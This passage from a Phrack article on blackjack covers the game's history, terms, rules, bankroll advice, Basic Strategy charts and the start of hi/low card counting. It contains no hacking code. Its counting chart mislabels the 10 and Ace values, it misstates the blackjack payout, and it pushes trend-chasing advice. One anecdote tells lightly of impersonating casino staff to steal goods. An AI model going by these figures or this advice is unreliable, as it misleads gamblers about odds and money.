it is today. I was surprised as hell to find that it was checked out over 20 times in the past year and a half or so! How many books from 1962 can claim that? I do not recommend reading the book for anything other than posterity purposes though, the reason being that newer books contain better, and easier to learn strategies. Another major contributor in the history of winning BlackJack play is Julian Braun who worked at IBM. His thousands of lines of computer code and hours of BlackJack simulation on IBM mainframes resulted in THE Basic Strategy, and a number of card counting techniques. His conclusions were used in a 2nd edition of Beat the Dealer, and later in Lawrence Revere's 1977 book "Playing BlackJack as a Business". Lastly, let me mention Ken Uston, who used five computers that were built into the shoes of members of his playing team in 1977. They won over a hundred thousand dollars in a very short time but one of the computers was confiscated and sent to the FBI. The fedz decided that the computer used public information on BlackJack playing and was not a cheating device. You may have seen this story in a movie made about his BlackJack exploits detailed in his book "The Big Player". Ken was also featured on a 1981 Sixty Minutes show and helped lead a successful legal challenge to prevent Atlantic City casinos from barring card counters. Useful Definitions: ------------------- Just as in Social Engineering the Phone Company, an essential element for success is knowing the right buzzwords and acronyms. Therefore, I list some relevant definitions now, even though the reader will probably skip over them to get to the good stuff. The definitions merely serve as a reference for those who are uninitiated with the terminology of gambling, casinos, and BlackJack. If you encounter a term you don't understand in the article, look back here. The definitions are not in alphabetical order on purpose. I grouped them in what I feel is a logical and easy to remember fashion. Action: This is a general gambling term which refers to the total amount of money bet in a specific period of time. Ten bets of ten dollars each is $100 of action. Burn Card: A single card taken from the top of the deck or the first card in a shoe which the dealer slides across the table from his/her left to the right, and is placed into the discard tray. The card may or may not be shown face up (which can affect the count if you are counting cards). A card is burned after each shuffle. I have not been able to find out how this started nor the purpose for burning a card. If you know, drop me some email. Cut Card: A solid colored card typically a piece of plastic which is given to a player by the dealer for the purpose of cutting the deck(s) after a shuffle. Cutting the cards in the 'right' location is part of the 'shuffle tracking' strategy mentioned later in Part 2. Hole Card: Any face down card. The definition most often refers to the dealer's single face down card however. Shoe: A device that can hold up to eight decks of cards which allows the dealer to slide out the cards one at a time. Hard Hand: A hand in which any Ace is counted as a 1 and not as an 11. Soft Hand: A hand in which any Ace is counted as an 11 and not as a 1. Pat Hand: A hand with a total of 17 to 21. Stand: To decline another card. Hit: To request another card. Bust: When a hand's value exceeds 21....a losing hand. Push: A player-dealer tie. Pair: When a player's first two cards are numerically identical (ie, 7,7). Point Count: The net value of the card count at the end of a hand. Running Count: The count from the beginning of the deck or shoe. The running count is updated by the value of the point count after each hand. True Count: The running count adjusted to account for the number of cards left in the deck or shoe to be played. Bankroll: The stake (available money) a player plans to bet with. Flat Bet: A bet which you do not vary ie, if you are flat betting ten dollars, you are betting $10 each and every hand without changing the betting amount from one hand to the next. Black Chip: A $100. chip. Green Chip: A $25.00 chip. Red Chip: A $5.00 chip. Foreign Chip: A chip that is issued by one casino and is honored by another as cash. A casino is not necessarily obligated to accept them. Settlement: The resolving of the bet. Either the dealer takes your chips, pays you, or in the case of a push, no exchange of chips occurs. Toke: Its not what some of you may think...to "toke" the dealer is just another word for tipping the dealer. Marker: An IOU. A line of credit provided by the casino to a player. Junket: An organized group of gamblers that travel to a casino together. Junkets are usually subsidized by a casino to attract players. Comp: Short for complimentary. If you wave lots of money around, the casino (hotel) may give you things like a free room or free f00d hoping you'll keep losing money at the tables in their casino. Heat: The pressure a casino puts on a winning player, typically someone who is suspected of being a card counter. Shuffle Up: Prematurely shuffling the cards to harass a player who is usually suspected of being a counter. Nut: The overhead costs of running the casino. Pit: The area inside a group of gaming tables. The tables are arranged in an elliptical manner, the space inside the perimeter is the pit. House: The Casino of course. Cage: Short for cashier's cage. This is where chips are redeemed for cash, checks cashed, credit arranged, etc. House Percentage: The casino's advantage in a particular game of chance. Drop Percentage: That portion of the player's money that the casino will win because of the house percentage. It is a measure of the amount of a player's initial stake that he or she will eventually lose. On average this number is around 20 percent. That is, on average, Joe Gambler will lose $20 of every $100 he begins with. Head-On: To play alone at a BlackJack table with the dealer. WAG Player: Wild Assed Guessing player. SWAG Player: Scientific Wild Assed Guessing player. Tough Player: What the casino labels an '3L33T' player who can hurt the casino monetarily with his or her intelligent play. Counter: Someone who counts cards. High Roller: A big bettor. Mechanic: Someone who is elite in regards to manipulating cards, typically for illicit purposes. Shill: A house employee who bets money and pretends to be a player to attract customers. Shills typically follow the same rules as the dealer which makes them somewhat easy to spot (ie, they don't Double Down or Split). Pit Boss: An employee of the casino whose job is to supervise BlackJack players, dealers, and other floor personnel. Review of BlackJack Rules of Play: ---------------------------------- The rules of BlackJack differ slightly from area to area and/or from casino to casino. For example, a casino in downtown Vegas may have different rules than one of the Vegas Strip casinos which may have different rules from a casino up in Reno or Tahoe (Nevada). The rules in a casino in Freeport Bahamas may differ from those in Atlantic City, etc. Therefore, it is important to research, a priori, what the rules are for the area/casino(s) you plan on playing in. For Nevada casinos you can order a copy of [1] which contains rules info on all the licensed casinos in the state. Later in this article, you will see that each set of rule variations has a corresponding Basic Strategy chart that must be memorized. Memorizing all the charts can be too confusing and is not recommended. The BlackJack table seats a dealer and one to seven players. The first seat on the dealer's left is referred to as First Base, the first seat on the dealer's right is referred to as Third Base. A betting square is printed on the felt table in front of each player seat. Immediately in front of the dealer is the chip tray. On the dealer's left is the deck or shoe and beside that should be the minimum bet sign--something that you ought to read before sitting down to play. On the dealer's immediate right is the money drop slot where all currency and tips (chips) are deposited. Next to the drop slot is the discard tray. Play begins after the following ritual is completed: the dealer shuffles the cards, the deck(s) is "cut" by a player using the marker card, and the dealer "burns" a card. Before any cards are dealt, the players may make a wager by placing the desired chips (value and number) into the betting box. I used the word "may" because you are not forced to bet every hand. Occasionally a player may sit out a hand or two for various reasons. I have sat out a couple of hands at times when the dealer was getting extremely lucky and everyone was losing. If you attempt to sit out too many hands especially if there are people waiting to play at your table, you may be asked to leave the table until you are ready to play. If you don't have any chips, put some cash on the table and the dealer will exchange them for chips. Once all the bets are down, two cards (one at a time) are dealt from left to right. In many Vegas casinos, players get both cards face down. In Atlantic City and most every where else the player's cards are dealt face up. Should the cards be dealt face up, don't make the faux pas of touching them! They are dealt face up for a reason, primarily to prevent a few types of player cheating (see section on cheating in Part 2) and the dealer will sternly but nicely tell you not to touch the cards. As most of you know the dealer receives one card down and one card up. The numerical values of the cards are: (10, J, Q, K) = 10 ; (Ace) = 1 or 11 ; (other cards) = face value (3 = 3). Since a casino can be as noisy as an old Step-by-Step Switch with all those slot machines going, marbles jumping around on roulette wheels, demoniacal shrieks of "YO-LEVEN" at the craps table, people screaming that they hit the big one and so on, hand signals are usually the preferred method of signalling hit, stand, etc. If the cards were dealt face down and you want a hit, lightly flick the cards across the felt two times. If the cards were dealt face up, point at the cards with a quick stabbing motion. You may also want to nod your head yes while saying "hit". The best way to indicate to the dealer that you want to stand regardless of how the cards were dealt is to move your hand from left to right in a level attitude with your palm down. Your hand should be a few inches or so above the table. Nodding your head no at the same time helps, while saying "stay" or "stand". Permit me to interject a comment on the number of decks used in a game. Single deck games are pretty much restricted to Nevada casinos. In the casinos that have one-deck games, the tables are usually full. Multiple deck games typically consist of an even number of decks (2, 4, 6, 8) although a few casinos use 5 or 7 decks. The two main reasons many casinos use multiple decks are: 1) They allow the dealer to deal more hands per hour thereby increasing the casino take. 2) They reduce but in no way eliminate the player advantage gained from card counting. Dealer Rules - The rules the dealer must play by are very simple. If the dealer's hand is 16 or less, he/she must take a card. If the dealer's hand is 17 or more, he/she must stand. Note that some casinos allow the dealer to hit on soft 17 which gives the house a very small additional advantage. The dealer's strategy is fixed and what you and the other players have is immaterial to him/her as far as hitting and standing is concerned. Player rules - The player can do whatever he/she wants as far as hitting and standing goes with the exception of the following special circumstances. See the section on Basic Strategy for the appropriate times to hit, stand, split, and double down. The aim is to have a hand which is higher than the dealers'. If there is a tie (push), neither you nor the dealer wins. Should a player get a BlackJack (first 2 cards are an Ace and a ten) the payoff is 150% more than the original bet ie, bet $10.00 and the payoff is $15.00. DOUBLE DOWN: Doubling down is restricted to 2-card hands usually totalling 9, 10, or 11 although some casinos allow doubling down on any 2-card hand. If your first two cards provide you with the appropriate total and your cards were dealt face down, turn them over and put them on the dealer's side of the betting square. If your first two cards provide you with the appropriate total and your cards were dealt face up, point to them and say "double" when the dealer prompts you for a card and simultaneously put an equal amount of chips NEXT TO (not on top of) those already in the betting box. The dealer will give you one more card only, then he/she will move on to the next hand. SPLITTING PAIRS: If you have a pair that you want to split and your cards are dealt face down, turn them over and place them a few inches apart. If your cards were dealt face up, point to your cards and say "split" when the dealer prompts you for a card. The original bet will go with one card and you will have to place an equal amount of chips in the betting box near the other card. You are now playing two hands, each as though they were regular hands with the exception being that if you have just split two aces. In that case, you only get one card which will hopefully be a 10. If it is a ten, that hand's total is now 21 but the hand isn't considered a BlackJack. That is, you are paid 1:1 and not 1:1.5 as for a natural (BlackJack). Combined example of above two plays: Say you are dealt two fives. You split them (you dummy!). The next card is another 5 and you re-split them (you chucklehead!!). Three hands have grown out of one AND you are now in for three times your original bet. But wait. Say the next card is a six. So one hand is a 5,6 which gives you eleven; another just has a 5 and the other hand has a 5. You decide to double down on the first hand. You are dealt a 7 giving 18 which you stand on. Now a ten is dealt for the second hand and you decide to stay at 15. The last hand is the lonely third 5, which is dealt a four for a total of nine. You decide to double down and get an eight giving that hand a total of 17. Shit you say, you started with a twenty dollar bet and now you are in for a hundred! Better hope the dealer doesn't end up with a hand more than 18 lest you lose a C-note. The moral of this example is to not get caught up in the excitement and make rash decisions. However, there have been a couple of times where Basic Strategy dictated that certain split and double down plays should be made and I was very low on chips (and cash). Unless you are *really* psychic, don't go against Basic Strategy! I didn't and usually came out the better for it although I was really sweating the outcome of the hand due to my low cash status. The reason it was stupid to split two fives is that you are replacing a hand that is great for drawing on or doubling down on, by what will probably be two shitty hands. INSURANCE: This option comes into play when the dealer's up card is an Ace. At this point all the players have two cards. The dealer does not check his/her hole card before asking the players if they want insurance. The reason being evident as the dealer can't give away the value of the hole card if the dealer doesn't know what the hole card is. If a player wants insurance, half the original amount bet is placed on the semicircle labeled "insurance" which is printed on the table. If the dealer has a BlackJack the player wins the side bet (the insurance bet) but loses the original bet, thus providing no net loss or gain since insurance pays 2 to 1. If the dealer does not have a BlackJack, the side bet is lost and the hand is played normally. If you are not counting cards DO NOT TAKE INSURANCE! The proper Basic Strategy play is to decline. The time to take insurance is when the number of non-tens to tens drops below a 2 to 1 margin since insurance pays 2 to 1. It's simple math check it yourself. SURRENDER: This is a fairly obscure option that originated in Manila (Philippines) in 1958 and isn't available in many casinos. There are two versions, "early surrender" and "late surrender". Early surrender allows players to quit two-card hands after seeing the up card of the dealer. This option provides the player an additional 0.62 percent favorable advantage (significant) and therefore the obvious reason why many Atlantic City casinos abandoned the option in 1982. Late surrender is the same as early except that the player must wait until the dealer checks for a BlackJack. If the dealer does not have a BlackJack then the player may surrender. The following table was taken verbatim from [5] and is valid for games with 4+ decks. It details the best strategy regarding late surrender as determined from intensive computer simulation: TWO-CARD HAND TOTAL DEALER'S UP-CARD ------------- ----- ---------------- 9,7 16 ACE 10,6 * 16 * ACE 9,7 * 16 * 10 10,6 * 16 * 10 9,7 * 16 * 10 10,5 * 15 * 10 9,7 16 9 10,5 16 9 "In a single-deck game, you would surrender only the above hands marked with an asterisk, as well as 7,7 against a dealer's 10 up-card." [5] Casino variations - Note that some casinos do not permit doubling down on split pairs, and/or re-splitting pairs. These options provide the player with a slight additional advantage. Betting, Money Management, and the Psychology of Gambling: ---------------------------------------------------------- Let me begin this section with the following statement: SCARED MONEY RARELY WINS. Most gambling books devote quite a bit of time to the psychology of gambling and rightfully so. There is a fine line to responsible gambling. On one hand you shouldn't bet money that you cannot afford to lose. On the other hand, if you are betting with money you expect to lose, where is your confidence? When I used to gamble, it was small time. I define small time as bringing $250.00 of 'losable' money. I've lost that much in one night. I didn't like it, but I still ate that week. One pitfall you can easily fall into happens AFTER you lose. You scold yourself for losing money you could have done something productive with. "DAMN, I could have bought a 200 MB hard drive with that!#&!". You should think about these things BEFORE you play. Scared money is more in the mind than real. What I mean by that is even if you gamble with your last $10.00 in the world, it is important to play as though you have thousands of dollars in front of you. I don't mean piss the ten bucks away. I mean that there are certain plays you should make according to your chosen strategy which are the optimum mathematically. Don't make changes to it out of fear. Fear is not your friend. The "risk of ruin" is the percent chance that you will lose your entire bankroll. This percentage should not exceed 5% if you plan on playing multiple sessions to make money. The risk of ruin is dependent on the sizes of your bets during a session. The "Kelly Criterion" provides a zero percent risk of ruin. The system requires that you bet according to the percent advantage you have at any one time. For example, if you are counting cards and your advantage for a certain hand is 2% then you may bet 2% of your total bankroll. If your total is $1000. then you can bet $20. Note that if you won the hand your bankroll is now $1020 and if your advantage dropped to 1.5%, taking .015 times 1020 (which will determine your next bet size) in your head isn't all that easy. The literature provides more reasonable systems, but do yourself a favor and stay away from "betting progressions". See Reference [16] (available on the Internet) for more information regarding risk of ruin & optimal wagers. If you are gambling to make money, it is important to define how much cash you can lose before quitting. This number is called the "stop-loss limit". My stop-loss limit was my entire session bankroll which was $250 (50 betting units of $5.00 or 25 betting units of $10.00). This concept is especially important if you expect to play in the casinos for more than one session. Most books recommend that your session bankroll be about a fifth of your trip bankroll. Unfortunately, most people who have $500 in their wallet with a self imposed stop-loss limit is $200 will violate that limit should they lose the two hundred. Discipline is what separates the great players from the ordinary ones. Obviously you don't want to put a limit on how much you want to win. However, if you are keeping with a structured system there are certain limits to what your minimum and maximum bets should be. I am not going to go into that here though. In my gambling experience, there has been one non-scientific concept that has proven itself over and over again. NEVER BUCK A TREND! If you have just won three hands in a row, don't think that you are now 'due' for a loss and drastically scale back your bet. If you are winning go with it. A good friend of mine who was my 'gambling mentor' won $30,000 in a 24 hour period with a $200 beginning bankroll. This was not accomplished by scaling back bets. By the same token, if you see that the players at a certain table are losing consistently, don't sit down at that table. One problem that I've seen is when someone has won a lot and starts to lose. Mentally, they keep saying, "if I lose another $100 I will stop". They lose the hundred and say "no, really, the NEXT $100 I lose, I will stop", etc. When they go broke, that's when they stop. Live by the following graph typically designated as The Quitting Curve and you won't fall into that trap: | * <-+ | * * | Loss ^ | * * | Limit | | * * <----QUIT! <-+ | | * W | * i | * n | * n | * i | * n | * g | * | |_________________________________________ Time ----------------> Determine your loss limit and stay with it. Obviously the loss limit will change as you keep winning. Standard loss limits are 10 to 20 percent of the current bankroll. Note that this philosophy is also used in stock market speculation. Basic Strategy: --------------- If you only read one section of this file, and you don't already know what Basic Strategy is, then this is the section you should read. Knowing Basic Strategy is CRITICAL to you gaining an advantage over the house. The Basic Strategy for a particular set of rules was developed by intensive computer simulation which performed a complete combinatorial analysis. The computer "played" tens of thousands of hands for each BlackJack situation possible and statistically decided as to which play decision favored the player. The following 3 charts should be duplicated or cut out from a hardcopy of this file. You don't want to wave them around at a BlackJack table but its nice to have them on hand in case you fail to recall some plays, at which time you can run to the rest room to refresh your memory. I hope you don't think this is weird but I keep a copy of a certain Basic Strategy chart in my wallet at ALL times...just in case. Just in case of what you ask? Permit me to go off on a slight(?) tangent. The following story really happened. In 1984 I was visiting LOD BBS co-sysop, Paul Muad'dib up in New York City. After about a week we were very low on cash despite the Pay Phone windfall mentioned in my Phrack Pro-Phile ;->. I contacted a friend of mine who was working in New Jersey and he offered us a job for a couple of days. I spent just about the last of my cash on bus fair for me and Paul figuring that I would be getting more money soon. Some how, the destination was miscommunicated and we ended up in Atlantic City, which was not the location of the job. We were stuck. Our only recourse was to attempt to win some money to get us back on track. First we needed a little more capital. Paul, being known to physically impersonate phone company workers, and a Department of Motor Vehicles computer technician among others, decided to impersonate a casino employee so he could "look around". Look around he did, found a storage closet with a portable cooler and a case of warm soda, not exactly a gold mine but hey. He proceeded to walk that stuff right out of the casino. We commandeered some ice and walked around the beach for an hour selling sodas. It wasn't all that bad as scantily clad women seemed to be the ones buying them. To cut the story short, Paul knew ESS but he didn't know BlackJack. He lost and we resorted to calling up Sharp Razor, a fellow Legion member residing in NJ, who gave us (or is it lent?) the cash to continue our journey. For the record, I was fairly clueless about BlackJack at the time which really means that I thought I knew how to play but really didn't because I didn't even know Basic Strategy. The same goes for Paul. Had we had a chart on hand, we would at least have made the correct plays. Here are the charts, memorize the one that is appropriate: Las Vegas Single Deck Basic Strategy Table Dealer's Up-Card Your +---+---+---+---+---+---+---+---+----+---+ Hand | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A | +-----+---+---+---+---+---+---+---+---+----+---+ | 8 | H | H | H | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 9 | D | D | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 10 | D | D | D | D | D | D | D | D | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 11 | D | D | D | D | D | D | D | D | D | D | +-----+---+---+---+---+---+---+---+---+----+---+ | 12 | H | H | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 13 | S | S | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 14 | S | S | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 15 | S | S | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 16 | S | S | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 17 | S | S | S | S | S | S | S | S | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ | A,2 | H | H | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,3 | H | H | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,4 | H | H | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,5 | H | H | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,6 | D | D | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,7 | S | D | D | D | D | S | S | H | H | S | +-----+---+---+---+---+---+---+---+---+----+---+ | A,8 | S | S | S | S | D | S | S | S | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ | A,9 | S | S | S | S | S | S | S | S | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ | A,A | P | P | P | P | P | P | P | P | P | P | +-----+---+---+---+---+---+---+---+---+----+---+ | 2,2 | H | P | P | P | P | P | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 3,3 | H | H | P | P | P | P | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 4,4 | H | H | H | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 6,6 | P | P | P | P | P | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 7,7 | P | P | P | P | P | P | H | H | S | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 8,8 | P | P | P | P | P | P | P | P | P | P | +-----+---+---+---+---+---+---+---+---+----+---+ | 9,9 | P | P | P | P | P | S | P | P | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ |10,10| S | S | S | S | S | S | S | S | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ H = Hit S = Stand D = Double Down P = Split Las Vegas Multiple Deck Basic Strategy Table Dealer's Up-Card Your +---+---+---+---+---+---+---+---+----+---+ Hand | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A | +-----+---+---+---+---+---+---+---+---+----+---+ | 8 | H | H | H | H | H | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 9 | H | D | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 10 | D | D | D | D | D | D | D | D | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 11 | D | D | D | D | D | D | D | D | D | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 12 | H | H | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 13 | S | S | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 14 | S | S | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 15 | S | S | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 16 | S | S | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 17 | S | S | S | S | S | S | S | S | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ | A,2 | H | H | H | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,3 | H | H | H | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,4 | H | H | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,5 | H | H | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,6 | H | D | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,7 | S | D | D | D | D | S | S | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,8 | S | S | S | S | S | S | S | S | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ | A,9 | S | S | S | S | S | S | S | S | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ | A,A | P | P | P | P | P | P | P | P | P | P | +-----+---+---+---+---+---+---+---+---+----+---+ | 2,2 | H | H | P | P | P | P | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 3,3 | H | H | P | P | P | P | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 4,4 | H | H | H | H | H | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 6,6 | H | P | P | P | P | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 7,7 | P | P | P | P | P | P | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 8,8 | P | P | P | P | P | P | P | P | P | P | +-----+---+---+---+---+---+---+---+---+----+---+ | 9,9 | P | P | P | P | P | S | P | P | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ |10,10| S | S | S | S | S | S | S | S | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ H = Hit S = Stand D = Double Down P = Split Atlantic City Multiple Deck Basic Strategy Table Dealer's Up-Card Your +---+---+---+---+---+---+---+---+----+---+ Hand | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A | +-----+---+---+---+---+---+---+---+---+----+---+ | 8 | H | H | H | H | H | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 9 | H | D | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 10 | D | D | D | D | D | D | D | D | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 11 | D | D | D | D | D | D | D | D | D | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 12 | H | H | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 13 | S | S | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 14 | S | S | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 15 | S | S | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 16 | S | S | S | S | S | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 17 | S | S | S | S | S | S | S | S | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ | A,2 | H | H | H | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,3 | H | H | H | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,4 | H | H | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,5 | H | H | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,6 | H | D | D | D | D | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,7 | S | D | D | D | D | S | S | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | A,8 | S | S | S | S | S | S | S | S | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ | A,9 | S | S | S | S | S | S | S | S | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ | A,A | P | P | P | P | P | P | P | P | P | P | +-----+---+---+---+---+---+---+---+---+----+---+ | 2,2 | P | P | P | P | P | P | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 3,3 | P | P | P | P | P | P | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 4,4 | H | H | H | P | P | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 6,6 | P | P | P | P | P | H | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 7,7 | P | P | P | P | P | P | H | H | H | H | +-----+---+---+---+---+---+---+---+---+----+---+ | 8,8 | P | P | P | P | P | P | P | P | P | P | +-----+---+---+---+---+---+---+---+---+----+---+ | 9,9 | P | P | P | P | P | S | P | P | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ |10,10| S | S | S | S | S | S | S | S | S | S | +-----+---+---+---+---+---+---+---+---+----+---+ H = Hit S = Stand D = Double Down P = Split End of "How To Hack BlackJack": File 1 of 2  ==Phrack Magazine== Volume Four, Issue Forty-Three, File 10 of 27 How to "Hack" BlackJack By Lex Luthor lex@mindvox.phantom.com Part 2 of 2 (50K) Card Counting: -------------- Card Counting? Don't you have to be some sort of mathematical genius or have a photographic memory to count cards? No, these are as mythical as that 415-BUG-1111 "trace detector" number posted on all those old hacker BBSes. Well, you may now say, what if the casino is using 4, 6, or even 8 decks? Surely you can't keep track of 300+ cards! Don't sweat these details. Probably the hardest part about learning to play successful BlackJack has already been accomplished in the previous section. That is: memorizing the appropriate basic strategy chart. All you really need to count cards is the ability to count up to plus or minus twelve or so...by ONES! Of course there are more complicated systems but that is all you need to do for the simplest ones. The first card counting systems were developed by our old friend Dr. Thorp. He determined through mathematical computation that the card that has the most influence on the deck being in a favorable condition (for the player) was the five. When the deck is low in fives, the player has a higher advantage than if it's sparse in any other card. Logic dictated that for a very simple card counting strategy, simply keep track of the abundance (or lack thereof) of fives. This is the basis of his "Five Count" system which was later improved to include tens and renamed the "Ten Count" system. Today, there are many different card counting systems. Typically, the more complex a system is, the better your advantage should you master it. However, the difference between card counting System X and System Y is usually so small that ease of using the system becomes more important than gaining an additional .15 % advantage or whatever it is. I am going to restrict the discussion to a single card counting system: the high/low (also called the plus/minus) point count. This strategy is very easy to master. Two other methods that I recommend if you're serious are the Advanced Plus/Minus and the "Hi-Opt I" systems. The former being similar to the high/low but assigns fractional values to certain cards as opposed to integer values which are easier to add in your head. The latter method is considered one of the most powerful yet reasonable (with respect to complexity) counting systems of all time and is detailed extensively on pages 213 to 277 of [7]. The quick and dirty reason why card counting works is this: The player gains an advantage when a deck has a SHORTAGE of cards valued 2, 3, 4, 5, 6, 7, 8. When a deck has a SHORTAGE of cards valued 9, 10, Ace; the player has a DISadvantage. If you can tell when the deck is rich in 9's, 10's, and Aces (ie, when you hold the advantage) you can do one of the following things: 1) Bet more money when the deck is favorable to you. 2) Alter your Basic Strategy play to account for the favorability thereby increasing the odds of winning a particular hand. 3) Combine 1 & 2 by betting more AND altering Basic Strategy. Now lets discuss the +/- Point Count. As you can see from the small chart below, a plus value is given to low cards, and a minus value is given to high cards. Notice that 7, 8, and 9 have a value of zero. This is because their overall effect is negligible as compared to the others. Some systems use a value of -2 for the Ace instead of -1 and give a value of +1 to the seven instead of zero. If you are using a BlackJack computer game for practice, check to see what card counting system(s) it uses. They should offer one of the above two variations. Learn that one, since it will allow you to prepare well for actual casino play. See the "Some Comments Regarding Computer BlackJack Programs for the PC" section for more on this. Now the chart: +-----------------------------------------+ | PLUS (+1) || MINUS (-1) | +-----------------------------------------+ | 2 | 3 | 4 | 5 | 6 || 7 | 8 | 9 | 10 | A | +-----------------------------------------+ | 1 | 1 | 1 | 1 | 1 || 0 | 0 | 0 | 1 | 1 | +-----------------------------------------+ As you may notice, this is a balanced system. There are 20 cards in a deck that are valued +1: two through six. There are 16 ten value cards and 4 Aces in a deck (20 total) that are valued -1. The remaining 12 cards (7, 8, 9) have a value of zero. At the end of a deck the count should be zero. A good drill to practice is to get a deck of cards, turn them over one by one, and keep track of the count. If you enter a game mid-way between the deck or shoe, flat bet until the cards are shuffled. Once the cards are shuffled commence counting from zero. Lets do a quick example using ten cards. The following ten cards are shown in the course of a hand: A, 4, 7, 10, 10, 9, 10, 2, 10, 5. Just so no one gets lost, we will do one card at a time and then keep the running total: the first value is -1 (the Ace) & the second is +1 (the 4) = 0 (the current total hand count). The next card is the 7 which is zero so disregard it. The next card is a ten so the total count is now -1. The next card is another ten, giving a total count of -2. The next card is a nine which has a value of zero so ignore it, total count is still at -2. Next is a ten, total count is at -3. Next is a two which adds +1 to the minus three yielding a total of -2. A quick look at the next two cards shows that the two will cancel each other out (-1+1=0). So at the end of a hand of ten cards dealt to 2 players and the dealer, the point count is minus two. This provides you with the knowledge that your are at a slight disadvantage. Your next bet should either be the same or a unit or two lower. From this example you see that it would be easier to count cards if you play in a "cards-up" game. That way you can see all the cards as they are dealt and count them as they go by. When the dealer deals fast, just count every two cards. You still count each card but you only add to your total count after every two cards since many times the two values will cancel each other out to give a net value of zero, which doesn't need to be added to your total. If you play in a cards-down game, you may want to consider playing at third base. The reason being is that in a cards-down game you only see the other players' cards: a) if you peek at their hand (not polite but it's not cheating like in poker) b) if a player busts c) when the dealer settles each players' hand. When there are other people at a table, all this happens rather quickly and you may miss a few cards here and there which essentially invalidates your count. You can't control how fast the dealer deals, but you can slow things down when the dealer prompts you for a play decision. I am not going to discuss changing basic strategy here. The chart you memorize in Basic Strategy section of this file will be fine for now. If you are already adept at the plus/minus count then find a book that has a complete system including the appropriate changes to Basic Strategy that reflect the 